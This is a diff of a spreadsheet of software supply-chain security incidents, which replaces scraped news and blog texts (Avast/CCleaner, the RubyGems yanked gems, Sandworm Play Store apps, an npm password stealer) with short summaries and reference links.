-          <t>['buyer', 'guide', 'software', 'supply', 'chain', 'download', 'moment', 'actionable', 'spot', 'report', 'enterprise', 'software', 'supply', 'chain', 'risk', 'insight', 'solution', 'software', 'supply', 'chain', 'procurement', 'spectra', 'build', 'release', 'automate', 'support', 'triage', 'incident', 'response', 'protect', 'cloud', 'file', 'share', 'ransomware', 'feed', 'sandbox', 'email', 'intelligence', 'platform', 'intelligence', 'platform', 'product', 'technology', 'product', 'technology', 'titanium', 'platform', 'assure', 'software', 'supply', 'chain', 'elastic', 'infrastructure', 'analysis', 'free', 'open', 'source', 'yara', 'rule', 'partner', 'partner', 'partner', 'value', 'partner', 'marketplace', 'alliance', 'resource', 'resource', 'blog', 'content', 'library', 'software', 'deconstruction', 'demo', 'series', 'reversingglass', 'concept', 'rule', 'video', 'company', 'company', 'leadership', 'career', 'series', 'investment', 'company', 'news', 'event', 'event', 'press', 'release', 'news', 'demo', 'contact', 'support', 'login', 'blog', 'developer', 'portal', 'search', 'reversinglab', 'blog', 'supply', 'chain', 'package', 'password', 'malware', 'package', 'manager', 'repository', 'author', 'chief', 'software', 'architect', 'cofounder', 'software', 'developer', 'supply', 'chain', 'popularization', 'package', 'manager', 'integration', 'development', 'pipeline', 'ecosystem', 'interesting', 'target', 'various', 'actor', 'successful', 'frequency', 'story', 'medium', 'supply', 'chain', 'attack', 'daily', 'basis', 'developer', 'account', 'build', 'environment', 'main', 'way', 'attacker', 'development', 'infrastructure', 'infinite', 'number', 'way', 'plant', 'malware', 'backdoor', 'software', 'package', 'backdoor', 'tricky', 'single', 'line', 'code', 'logic', 'program', 'backdoor', 'unauthorized', 'access', 'system', 'single', 'line', 'code', 'script', 'remote', 'server', 'download', 'instruction', 'infected', 'machine', 'supply', 'chain', 'attack', 'postinfection', 'developer', 'realization', 'system', 'malware', 'successful', 'backdoor', 'installation', 'second', 'stage', 'payload', 'credential', 'malware', 'mining', 'software', 'today', 'world', 'attacker', 'motivated', 'position', 'sort', 'complexity', 'supply', 'chain', 'attack', 'backdoor', 'infection', 'single', 'line', 'code', 'hundred', 'other', 'original', 'software', 'author', 'package', 'other', 'package', 'repository', 'checking', 'code', 'task', 'least', 'node', 'package', 'manager', 'javascript', 'developer', 'package', 'file', 'worth', 'datum', 'number', 'big', 'entire', 'repository', 'titanium', 'platform', 'static', 'analysis', 'solution', 'single', 'server', 'processor', 'nvme', 'disk', 'analysis', 'day', 'hour', 'complete', 'worth', 'metadata', 'static', 'analysis', 'engine', 'hunt', 'malicious', 'file', 'complex', 'question', 'package', 'portable', 'executable', 'file', 'similar', 'malicious', 'piece', 'code', 'title', 'blog', 'breakdown', 'interesting', 'file', 'type', 'subtype', 'analysis', 'javascript', 'breakdown', 'filetype', 'subtype', 'repository', 'presence', 'executable', 'code', 'window', 'file', 'graph', 'close', 'look', 'package', 'file', 'type', 'plethora', 'application', 'common', 'thirdparty', 'library', 'wellknown', 'unwanted', 'application', 'password', 'recovery', 'tool', 'call', 'kind', 'application', 'unwanted', 'misuse', 'context', 'password', 'recovery', 'tool', 'refresh', 'memory', 'forget', 'website', 'credential', 'repository', 'password', 'recovery', 'tool', 'question', 'webbrowserpassview', 'website', 'login', 'information', 'internet', 'explorer', 'opera', 'interface', 'usage', 'straightforward', 'reason', 'actor', 'tool', 'fact', 'command', 'line', 'graphical', 'interface', 'store', 'credential', 'list', 'file', 'perfect', 'actor', 'complexity', 'password', 'recovery', 'focus', 'easy', 'credential', 'password', 'recovery', 'tool', 'package', 'bbbuilder', 'story', 'interesting', 'repository', 'active', 'open', 'source', 'developer', 'hundred', 'personal', 'page', 'bbbuilder', 'project', 'project', 'page', 'account', 'inspection', 'code', 'different', 'version', 'bbbuilder', 'picture', 'code', 'help', 'metadata', 'registry', 'track', 'package', 'timeline', 'supply', 'chain', 'attack', 'reconstructed', 'bbbuilder', 'project', 'initial', 'version', 'repository', 'package', 'empty', 'basic', 'placeholder', 'manifest', 'test', 'developer', 'credential', 'valid', 'bbbuilder', 'project', 'version', 'first', 'version', 'password', 'recovery', 'tool', 'rudimentary', 'code', 'call', 'tool', 'password', 'html', 'file', 'test', 'level', 'repository', 'password', 'recovery', 'tool', 'block', 'package', 'malicious', 'bbbuilder', 'project', 'version', 'dependency', 'axio', 'package', 'http', 'client', 'request', 'dependency', 'submit', 'password', 'recovery', 'output', 'server', 'project', 'version', 'attacker', 'password', 'recovery', 'output', 'current', 'directory', 'great', 'idea', 'discreet', 'location', 'bbbuilder', 'project', 'version', 'attacker', 'server', 'receive', 'password', 'traffic', 'test', 'machine', 'code', 'password', 'recovery', 'output', 'bbbuilder', 'project', 'version', 'attacker', 'refactor', 'little', 'easy', 'road', 'bbbuilder', 'project', 'version', 'attacker', 'evidence', 'form', 'password', 'recovery', 'output', 'great', 'idea', 'code', 'submission', 'server', 'final', 'version', 'bbbuilder', 'project', 'image', 'code', 'credential', 'theft', 'bbbuilder', 'download', 'statistic', 'package', 'glimpse', 'possible', 'prevalence', 'field', 'download', 'statistic', 'project', 'bbbuilder', 'package', 'dependency', 'installation', 'prevalence', 'wrongful', 'installation', 'developer', 'different', 'package', 'similar', 'name', 'repository', 'host', 'dozen', 'package', 'term', 'likely', 'one', 'bbbuilder', 'package', 'bbbuild', 'domain', 'credential', 'point', 'damage', 'bbbuilder', 'package', 'cause', 'existence', 'cautionary', 'tale', 'easy', 'kind', 'attack', 'plain', 'sight', 'undetected', 'long', 'time', 'titanium', 'platform', 'static', 'analysis', 'solution', 'capable', 'challenge', 'large', 'dataset', 'analysis', 'power', 'malware', 'detection', 'rule', 'flexibility', 'user', 'rapid', 'hunting', 'iteration', 'dataset', 'public', 'private', 'hunting', 'threat', 'software', 'supply', 'chain', 'attack', 'developer', 'possible', 'platform', 'single', 'package', 'package', 'bbbuilder102', 'f0af6bfb31acd4b73ba75efa4c135a498e8545ac0bf74abd8b654d38a27a4e55', 'disclosure', 'timeline', 'team', 'team', 'package', 'advisory', 'static', 'analysis', 'malicious', 'code', 'package', 'manager', 'repository', 'podcast', 'cyberwire', 'malware', 'package', 'manager', 'repository', 'speed', 'trend', 'landscape', 'state', 'software', 'supply', 'chain', 'spectra', 'assure', 'software', 'supply', 'chain', 'update', 'understanding', 'buyer', 'software', 'supply', 'chain', 'webinar', 'upgrade', 'report', 'action', 'state', 'supply', 'chain', 'state', 'software', 'supply', 'chain', 'gartner', 'software', 'supply', 'chain', 'risk', 'tag', 'appsec', 'supply', 'chain', 'blog', 'post', 'supply', 'chain', 'software', 'supply', 'chain', 'number', 'stat', 'state', 'software', 'supply', 'chain', 'recent', 'research', 'survey', 'application', 'development', 'pro', 'research', 'suspicious', 'nuget', 'package', 'data', 'industrial', 'system', 'long', 'driver', 'malicious', 'cyber', 'campaign', 'research', 'team', 'suspicious', 'sqzrframework480', 'campaign', 'devsecop', 'language', 'insight', 'lesson', 'memory', 'safety', 'stubborn', 'dangerous', 'software', 'weakness', 'insight', 'takeaway', 'issue', 'topic', 'blog', 'post', 'supply', 'chain', 'research', 'operation', 'product', 'technology', 'company', 'event', 'linkedin', 'subscribe', 'good', 'blog', 'inbox', 'weekly', 'date', 'trend', 'analysis', 'good', 'practice', 'intelligence', 'software', 'supply', 'chain', 'special', 'report', 'state', 'software', 'supply', 'chain', 'late', 'blog', 'post', 'medical', 'device', 'conversation', 'software', 'supply', 'chain', 'graduate', 'software', 'supply', 'chain', 'glassboard', 'conversation', 'field', 'software', 'package', 'deconstruction', 'video', 'conferencing', 'software', 'risk', 'software', 'supply', 'chain', 'software', 'supply', 'chain', 'hotline', 'immediate', 'assistance', 'software', 'supply', 'chain', 'issue', 'contact', 'response', 'blog', 'webinar', 'demo', 'video', 'news', 'glossary', 'career', 'contact', 'privacy', 'policy', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -3595,18 +3122,17 @@
           <t>CamScanner</t>
         </is>
       </c>
-      <c r="C122" t="inlineStr"/>
+      <c r="C122" t="inlineStr">
+        <is>
+          <t>Recent versions of the app shipped with an advertising library containing a malicious module.</t>
+        </is>
+      </c>
       <c r="D122" t="inlineStr">
         <is>
           <t>https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/
 https://www.androidpolice.com/2019/08/28/camscanner-play-store-malware/</t>
         </is>
       </c>
-      <c r="E122" t="inlineStr">
-        <is>
-          <t>[]</t>
-        </is>
-      </c>
     </row>
     <row r="123">
       <c r="A123" t="inlineStr">
@@ -3619,15 +3145,14 @@
           <t>Google Play Store</t>
         </is>
       </c>
-      <c r="C123" t="inlineStr"/>
+      <c r="C123" t="inlineStr">
+        <is>
+          <t>Mobile applications to track a device's communications or location were published to the Google Play Store.</t>
+        </is>
+      </c>
       <c r="D123" t="inlineStr">
         <is>
           <t>https://research.checkpoint.com/2019/the-eye-on-the-nile/</t>
-        </is>
-      </c>
-      <c r="E123" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -3644,17 +3169,12 @@
       </c>
       <c r="C124" t="inlineStr">
         <is>
-          <t>threatpost podcasts malware vulnerabilities infosec insiders webinars search found alexa google ‘voice phish’ eavesdrop users previous article turla compromises infiltrates iranian infrastructure next article avast network breached hackers target ccleaner author lindsey odonnell october minute read skip ccleaner target comments share article avast said believes actors looking target ccleaner supply chain attack czech antivirus vendor avast monday warned hackers able access internal network using temporary account avast said believes intrusion first detected sept likely targeting ccleaner business supply chain attack ccleaner software fights infections previously infiltrated attackers compromise million people’s systems “from insights gathered clear extremely sophisticated attempt intention leave traces intruder purpose actor progressing exceptional caution order detected” said jaya baloo chief information officer avast post monday know actor likely never know sure named attempt ‘abiss’” avast first alerted intrusion alert microsoft advanced threats analytics microsoft service monitors potential suspicious activity sept however observing previous microsoft advanced threats analytics alerts avast found attackers attempted access network least seven times attempts first starting order track actor left open temporary profile continuing monitor investigate access going profile ready conduct remediation actions” said avast intruder able connect temporary account public address using compromised username password avast said temporary account “erroneously kept enabled” require twofactor authentication making easier hackers compromise user temporary domain admin privileges however successful privilege escalation attack actor managed obtain domain admin privileges said avast avast provide details privilege escalation attack avast detail implications breach sept microsoft advanced threats analytics alert warned malicious replication directory services internal company also said temporary profile used multiple sets user credentials leading avast believe users subject credential theft ccleaner target ccleaner previously targeted attack believed intended target latest attack said avast avast acquired piriform owns cleaning tool ccleaner formerly crap cleaner july months malware attack ccleaner discovered avast said investigations attack showed actors planning install third round shadowpad malware compromised computers avast said know recent attack actor recent attack however avast said able bolster remediation efforts limit damage sept avast halted upcoming ccleaner releases began checking prior ccleaner releases verify malicious alterations made avast also disabled reset internal user credentials preventative measures first resigned clean update product pushed users automatic update october second revoked previous certificate” said avast “having taken precautions confident ccleaner users protected unaffected” experts like kevin beaumont praised avast “incredible transparency” around hack incredible transparency avast antivirus vendor somebody basically cloned active directory access least worth reading many orgs kind issues httpstcozsbdfgoksi kevin beaumont gossithedog october moving forward avast said continue monitor actor’s movements coordination czech intelligence agency information service local czech police force cybersecurity division “external forensics team” cybersecurity issues associated privileged account access credential governance experts thycotic discuss upcoming free threatpost webinar “hackers pros agree disagree comes privileged access security” click register share article breach hacks suggested articles cybercriminals ramp exploits serious zyxel flaw zyxel networking products could vulnerable hardcoded credential vulnerability cve202029583 potentially allowing cybercriminal device takeover january leading game publishers hard leakedcredential epidemic leaked credentials tied dozen leading gaming companies sale online january japanese aerospace firm kawasaki warns data breach japanese aerospace manufacturer said starting june overseas unauthorized access servers compromised customer data december infosec insider securing move hybrid cloud august physical maintenance never afterthought july conti’s reign chaos costa rica crosshairs july impacts cyber insurance july rethinking vulnerability management heightened landscape july threatpost first stop news home contact feeds copyright threatpost privacy policy terms conditions topics black breaking news cloud critical infrastructure cryptography facebook government hacks malware mobile podcasts privacy rsac analyst summit videos vulnerabilities threatpost topics cloud malware vulnerabilities privacy show black critical infrastructure cryptography facebook featured government hacks mobile podcasts rsac analyst summit slideshow videos authors elizabeth montalbano nate nelson threatpost home contact feeds search infosec insider infosec insider post infosec insider content written trusted community threatpost cybersecurity subject matter experts contribution goal bringing unique voice important cybersecurity topics content strives highest quality objective noncommercial sponsored sponsored content sponsored content paid advertiser sponsored content written edited members sponsor community content creates opportunity sponsor provide insight commentary pointofview directly threatpost audience threatpost editorial team participate writing editing sponsored content</t>
+          <t>Czech antivirus vendor Avast on Monday warned that hackers were able to access its internal network using a temporary VPN account.</t>
         </is>
       </c>
       <c r="D124" t="inlineStr">
         <is>
           <t>https://threatpost.com/avast-network-breached-as-hackers-target-ccleaner-again/149358</t>
-        </is>
-      </c>
-      <c r="E124" t="inlineStr">
-        <is>
-          <t>['podcast', 'malware', 'infosec', 'insider', 'search', 'alexa', 'voice', 'phish', 'eavesdrop', 'user', 'previous', 'article', 'compromise', 'iranian', 'infrastructure', 'next', 'article', 'avast', 'network', 'hacker', 'minute', 'comment', 'share', 'article', 'avast', 'actor', 'target', 'supply', 'chain', 'attack', 'vendor', 'avast', 'hacker', 'able', 'internal', 'network', 'temporary', 'account', 'avast', 'intrusion', 'supply', 'chain', 'attack', 'software', 'infection', 'attacker', 'people', 'system', 'insight', 'sophisticated', 'attempt', 'intention', 'trace', 'intruder', 'purpose', 'actor', 'exceptional', 'caution', 'order', 'chief', 'information', 'officer', 'avast', 'post', 'know', 'actor', 'attempt', 'abiss', 'avast', 'intrusion', 'alert', 'service', 'potential', 'suspicious', 'activity', 'previous', 'threat', 'analytic', 'alert', 'avast', 'attacker', 'access', 'network', 'time', 'attempt', 'order', 'track', 'actor', 'open', 'temporary', 'profile', 'monitor', 'access', 'profile', 'ready', 'conduct', 'remediation', 'action', 'avast', 'intruder', 'able', 'temporary', 'account', 'public', 'address', 'username', 'password', 'avast', 'temporary', 'account', 'twofactor', 'authentication', 'easy', 'hacker', 'user', 'temporary', 'domain', 'admin', 'privilege', 'successful', 'privilege', 'escalation', 'attack', 'actor', 'domain', 'admin', 'privilege', 'avast', 'avast', 'provide', 'detail', 'privilege', 'escalation', 'attack', 'avast', 'detail', 'implication', 'threat', 'analytic', 'alert', 'malicious', 'replication', 'directory', 'service', 'internal', 'company', 'temporary', 'profile', 'multiple', 'set', 'user', 'credential', 'avast', 'user', 'subject', 'credential', 'theft', 'attack', 'target', 'late', 'attack', 'avast', 'avast', 'piriform', 'tool', 'ccleaner', 'clean', 'month', 'avast', 'investigation', 'attack', 'actor', 'third', 'round', 'computer', 'avast', 'recent', 'attack', 'actor', 'recent', 'attack', 'able', 'remediation', 'effort', 'damage', 'upcoming', 'ccleaner', 'release', 'ccleaner', 'release', 'malicious', 'alteration', 'avast', 'disabled', 'reset', 'internal', 'user', 'credential', 'preventative', 'measure', 'clean', 'update', 'product', 'user', 'automatic', 'update', 'second', 'previous', 'certificate', 'avast', 'precaution', 'confident', 'ccleaner', 'user', 'unaffected', 'expert', 'avast', 'incredible', 'transparency', 'incredible', 'transparency', 'avast', 'vendor', 'active', 'directory', 'access', 'worth', 'many', 'org', 'kind', 'issue', 'httpstcozsbdfgoksi', 'monitor', 'actor', 'movement', 'coordination', 'czech', 'intelligence', 'agency', 'information', 'service', 'local', 'czech', 'police', 'force', 'cybersecurity', 'division', 'external', 'forensic', 'team', 'cybersecurity', 'issue', 'privileged', 'account', 'access', 'credential', 'governance', 'expert', 'thycotic', 'upcoming', 'free', 'threatpost', 'webinar', 'hacker', 'pro', 'privileged', 'access', 'security', 'click', 'share', 'article', 'breach', 'hack', 'article', 'cybercriminal', 'serious', 'zyxel', 'flaw', 'zyxel', 'networking', 'product', 'credential', 'vulnerability', 'cve202029583', 'cybercriminal', 'device', 'takeover', 'game', 'publisher', 'hard', 'leakedcredential', 'epidemic', 'credential', 'dozen', 'gaming', 'company', 'online', 'datum', 'breach', 'japanese', 'aerospace', 'manufacturer', 'unauthorized', 'access', 'server', 'customer', 'datum', 'infosec', 'insider', 'move', 'hybrid', 'physical', 'maintenance', 'reign', 'cyber', 'insurance', 'vulnerability', 'management', 'landscape', 'home', 'contact', 'copyright', 'policy', 'term', 'topic', 'black', 'news', 'cloud', 'critical', 'infrastructure', 'cryptography', 'facebook', 'government', 'hack', 'podcast', 'privacy', 'rsac', 'analyst', 'summit', 'video', 'topic', 'privacy', 'black', 'critical', 'infrastructure', 'cryptography', 'facebook', 'government', 'mobile', 'podcast', 'rsac', 'analyst', 'summit', 'author', 'contact', 'search', 'infosec', 'insider', 'infosec', 'insider', 'post', 'infosec', 'insider', 'content', 'community', 'threatpost', 'cybersecurity', 'subject', 'matter', 'expert', 'goal', 'unique', 'voice', 'important', 'cybersecurity', 'topic', 'content', 'high', 'quality', 'objective', 'noncommercial', 'content', 'content', 'advertiser', 'content', 'member', 'sponsor', 'community', 'content', 'opportunity', 'sponsor', 'insight', 'commentary', 'editorial', 'team', 'editing', 'content']</t>
         </is>
       </c>
     </row>
@@ -3669,15 +3189,14 @@
           <t>Apple App Store</t>
         </is>
       </c>
-      <c r="C125" t="inlineStr"/>
+      <c r="C125" t="inlineStr">
+        <is>
+          <t>Wandera's threat research team has discovered 17 apps on the Apple App Store that are infected with clicker trojan malware.</t>
+        </is>
+      </c>
       <c r="D125" t="inlineStr">
         <is>
           <t>https://www.wandera.com/ios-trojan-malware/</t>
-        </is>
-      </c>
-      <c r="E125" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -3694,17 +3213,12 @@
       </c>
       <c r="C126" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert rubygems rubygemsorg public notifications fork star code issues pull requests discussions actions wiki insights additional navigation options code issues pull requests discussions actions wiki insights gems yanked accounts locked jump bottom aditya prakash edited page revisions select scenarios published could yanked account locked rubygemsorg team members creates backdoor remote code execution steals sensitive information host like http cookies contains code malware wiki document yanked gems accounts locked along rationale action account locked petergibbons2 yanked httpsrubygemsorggemsprettycolorversions081 reason obfuscated code beautification matching malware code httpsgithubcom365sectwannacryblobmasterwannacryvbs account locked mikejudge yanked httpsrubygemsorggemsrubybitcoinversions0020 reason obfuscated code beautification matching malware code httpsgithubcom365sectwannacryblobmasterwannacryvbs february accounts locked petergibbons jimcarrey yanked httpsgistgithubcomcolbyswandale11dadff435b02f887fc68178cd4fb0dc april yanked related httpsgithubcomrubygemsrubygemsorgissues1959 scriptyankgem yanking honeybadger initializing honeybadger error tracker ruby ship version460 frameworkrails level1 pid1361 yanking newer version available please upgrade ruby done yanked basicauthable related httpshelprubygemsorgdiscussionsproblems37137 yanking basicauthable done accounts locked davidspade mclovin mwmanning yanked restclient related httpsgithubcomrubygemsrubygemsorgissues2097 scriptyankuser mclovin yanking bitcoinvanity yanking litacoin yanking comingsoon yanking omniauthamazon scriptyankuser davidspade yanking cronparser yanking coinbase yanking blockchainwallet yanking awesomebot yanking dogecoin yanking capistranocolors july account locked homografo gems yanked gems shaggy owner reason names invalid levenshtein rule related httpsgistgithubcomsonalkr1320af1746c14b42a41e01d20fffbed585b june account locked shaggy gems yanked gems shaggy owner reason gems contain code crypto mining cookiepassword stealing related rubygemsrubygemsorg2034 june account locked cryptice yanked versions passen reason latest version passen code cookie stealing related helprubygemsorg36541 toggle tagle contents pages home brainstorming contribution guidelines create development setup gems yanked accounts locked february april july june june help standup gemcutter owner problem webhooks ideas clone wiki locally footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>A package (or gem) named basic_authable was removed from RubyGems by the maintainers.</t>
         </is>
       </c>
       <c r="D126" t="inlineStr">
         <is>
           <t>https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked</t>
-        </is>
-      </c>
-      <c r="E126" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'rubygem', 'public', 'notification', 'star', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'gem', 'account', 'jump', 'bottom', 'aditya', 'prakash', 'page', 'revision', 'scenario', 'account', 'rubygemsorg', 'team', 'member', 'backdoor', 'remote', 'code', 'execution', 'sensitive', 'information', 'host', 'http', 'cookie', 'code', 'malware', 'document', 'gem', 'account', 'rationale', 'action', 'account', 'reason', 'code', 'beautification', 'account', 'reason', 'code', 'beautification', 'account', 'petergibbon', 'jimcarrey', 'scriptyankgem', 'honeybadger', 'honeybadger', 'error', 'pid1361', 'new', 'version', 'available', 'basicauthable', 'basicauthable', 'account', 'restclient', 'bitcoinvanity', 'litacoin', 'yanking', 'comingsoon', 'cronparser', 'coinbase', 'dogecoin', 'yanking', 'capistranocolor', 'account', 'homografo', 'gem', 'gem', 'owner', 'reason', 'invalid', 'account', 'shaggy', 'gem', 'gem', 'owner', 'reason', 'gem', 'code', 'mining', 'account', 'cryptice', 'version', 'passen', 'reason', 'late', 'version', 'code', 'cookie', 'toggle', 'content', 'page', 'home', 'brainstorming', 'contribution', 'guideline', 'development', 'setup', 'gem', 'account', 'idea', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -3721,17 +3235,13 @@
       </c>
       <c r="C127" t="inlineStr">
         <is>
-          <t>updates analysis group protecting users governmentbacked hacking disinformation share twitter facebook linkedin mail copy link analysis group protecting users governmentbacked hacking disinformation read share twitter facebook linkedin mail copy link shane huntley senior director analysis group share twitter facebook linkedin mail copy link googles analysis group works counter targeted governmentbacked hacking google users area invested deeply decade daily work involves detecting defeating threats warning targeted users customers world’s sophisticated adversaries spanning full range google products including gmail drive youtube past we’ve posted issues like phishing campaigns vulnerabilities disinformation going forward we’ll share technical details data threats detect counter advance broader digital discussion tracks targeted governmentbacked groups countries groups many goals including intelligence collection stealing intellectual property targeting dissidents activists destructive cyber attacks spreading coordinated disinformation intelligence gather protect google infrastructure well users targeted malware phishing phishing we’ve longstanding policy send users warnings detect subject statesponsored phishing attempts posted periodically july september sent warnings users countries targeted governmentbacked attackers consistent number warnings sent period distribution governmentbacked phishing targets julsep percent users targeted “credential phishing emails” similar example usually attempts obtain target’s password account credentials hijack account encourage highrisk users—like journalists human rights activists political campaigns—to enroll advanced protection program utilizes hardware keys provides strongest protections available phishing account hijackings designed specifically highestrisk accounts simple phishing example attacker sent phishing email alert lure “goolge” suggesting user secure account user clicks link enters password also asked code twofactor authentication enabled allowing attacker access account sample lure used phish gmail users detection last week cyberwarcon presented analysis previously undisclosed campaigns russianexus group called “sandworm” also known “iridium” it’s useful example type detailed detection work although much sandworm’s activity targeting ukraine attacks winter olympics covered publicly campaigns reported december discovered series campaigns sandworm attempting deploy android malware first campaign targeted users south korea sandworm modifying legitimate android applications malware uploaded modified apps play store using attackercontrolled developer accounts campaign sandworm uploaded eight different apps play store fewer total installs malicious apps targeting users south korea also identified earlier september android campaign sandworm used similar tactics deployed fake version ukrnet email play store application approximately total installs worked colleagues google play protect team write detections malware family eliminate november evidence sandworm shifted using attackercontrolled accounts upload malicious apps compromising legitimate developers throughout november sandworm targeted software mobile developers ukraine spear phishing emails malicious attachments least case compromised developer several published play store apps—one installs compromising developer sandworm built backdoor legitimate apps attempted publish play store adding implant code application package signing package compromised developer’s uploading play store however google play protect team caught attempt time upload result users infected able resecure developer’s account disinformation part google youtube’s broader efforts tackle coordinated influence operations attempt game services share relevant information campaigns enforcement tech companies examples reported recently worked recently took action russiaaffiliated influence operations targeting several nations africa operations inauthentic news outlets disseminate messages promoting russian interests africa observed local accounts people contribute operation tactic likely intended make content appear genuine targeted countries included central african republic sudan madagascar south africa languages used included english french arabic activity google services limited enforced across products swiftly terminated associated google accounts youtube channels continue monitor space discovery consistent recent observations actions announced facebook consistent recent bellingcat report identified campaign targeting indonesian provinces papua west papua messaging opposition free papua movement google terminated advertising account youtube channels partnerships works closely technology companies—including platforms specialized firms—to share intelligence best practices also share information enforcement course multiple teams google work issues coordinate going forward goal give updates attacks detects stops hope shining light actors helpful community deter future attacks lead better awareness protections among highrisk targets posted analysis group safety related stories safety review zeroday inthewild exploits today google released report “we’re together year review zerodays exploited inthewild 2023” maddie stone james sadowski google safety report duncan lennox chrome browse safely realtime protection chrome jonathan jasika bawa analysis group bulletin bulletin includes coordinated influence operation campaigns terminated platforms last updated march 2024januarywe blocked domains… shane huntley safety tackling cybersecurity vulnerabilities secure design royal hansen christoph kern safety working together address risks opportunities kent walker privacy terms google google products help deutsch english english africa english australia english canada english india english mena español españa español latinoamérica français canada français france italiano nederlands nederland polski português brasil اللغة العربية mena</t>
+          <t>In December 2017, TAG discovered a series of campaigns from Sandworm attempting to deploy Android malware. The first campaign targeted users in South Korea, where Sandworm was modifying legitimate Android applications with malware. They then uploaded these modified apps to the Play Store using their own attacker-controlled developer accounts. During this campaign, Sandworm uploaded eight different apps to the Play Store, each with fewer than 10 total installs. 
+We also identified an earlier September 2017 Android campaign from Sandworm where they used similar tactics and deployed a fake version of the UKR.net email app on the Play Store. This application had approximately 1,000 total installs. We worked with our colleagues on the Google Play Protect Team to write detections for this malware family, and eliminate it.</t>
         </is>
       </c>
       <c r="D127" t="inlineStr">
         <is>
           <t>https://blog.google/threat-analysis-group/protecting-users-government-backed-hacking-and-disinformation/</t>
-        </is>
-      </c>
-      <c r="E127" t="inlineStr">
-        <is>
-          <t>['analysis', 'group', 'user', 'governmentbacked', 'hacking', 'disinformation', 'share', 'twitter', 'facebook', 'linkedin', 'mail', 'copy', 'link', 'analysis', 'group', 'user', 'governmentbacked', 'hacking', 'disinformation', 'share', 'twitter', 'facebook', 'linkedin', 'mail', 'copy', 'link', 'senior', 'director', 'analysis', 'group', 'share', 'twitter', 'facebook', 'linkedin', 'mail', 'copy', 'link', 'google', 'analysis', 'group', 'counter', 'governmentbacked', 'area', 'deeply', 'decade', 'daily', 'work', 'threat', 'user', 'customer', 'world', 'sophisticated', 'adversary', 'full', 'range', 'google', 'product', 'gmail', 'drive', 'youtube', 'past', 'issue', 'phishing', 'campaign', 'disinformation', 'technical', 'detail', 'datum', 'threat', 'counter', 'advance', 'broad', 'digital', 'discussion', 'track', 'governmentbacked', 'group', 'country', 'group', 'many', 'goal', 'intelligence', 'collection', 'intellectual', 'property', 'dissident', 'activist', 'destructive', 'cyber', 'attack', 'coordinated', 'disinformation', 'intelligence', 'gather', 'infrastructure', 'user', 'malware', 'phishing', 'longstanding', 'policy', 'user', 'warning', 'subject', 'phishing', 'attempt', 'warning', 'user', 'country', 'governmentbacked', 'attacker', 'consistent', 'number', 'warning', 'period', 'distribution', 'phishing', 'target', 'julsep', 'percent', 'user', 'credential', 'phishing', 'email', 'similar', 'example', 'target', 'password', 'account', 'credential', 'account', 'highrisk', 'user', 'journalist', 'human', 'right', 'activist', 'political', 'campaign', 'advanced', 'protection', 'program', 'hardware', 'key', 'strong', 'protection', 'available', 'account', 'hijacking', 'highestrisk', 'simple', 'phishing', 'example', 'attacker', 'email', 'alert', 'lure', 'user', 'secure', 'account', 'user', 'link', 'password', 'twofactor', 'authentication', 'attacker', 'access', 'account', 'sample', 'lure', 'phish', 'gmail', 'user', 'detection', 'last', 'week', 'cyberwarcon', 'analysis', 'undisclosed', 'campaign', 'russianexus', 'group', 'sandworm', 'iridium', 'useful', 'example', 'type', 'detection', 'work', 'much', 'sandworm', 'activity', 'attack', 'winter', 'olympic', 'campaign', 'series', 'campaign', 'sandworm', 'campaign', 'user', 'sandworm', 'legitimate', 'application', 'app', 'store', 'developer', 'account', 'campaign', 'sandworm', 'different', 'app', 'store', 'few', 'total', 'malicious', 'app', 'user', 'early', 'campaign', 'sandworm', 'similar', 'tactic', 'fake', 'version', 'ukrnet', 'email', 'store', 'application', 'total', 'install', 'colleague', 'google', 'play', 'protect', 'team', 'detection', 'family', 'evidence', 'sandworm', 'account', 'malicious', 'app', 'legitimate', 'developer', 'sandworm', 'software', 'mobile', 'developer', 'ukraine', 'spear', 'email', 'malicious', 'attachment', 'least', 'case', 'developer', 'several', 'play', 'store', 'app', 'developer', 'sandworm', 'backdoor', 'legitimate', 'app', 'play', 'store', 'implant', 'code', 'application', 'package', 'signing', 'package', 'developer', 'uploading', 'play', 'store', 'play', 'protect', 'team', 'attempt', 'time', 'upload', 'result', 'user', 'able', 'resecure', 'developer', 'account', 'disinformation', 'part', 'broad', 'effort', 'influence', 'operation', 'game', 'service', 'relevant', 'information', 'campaign', 'tech', 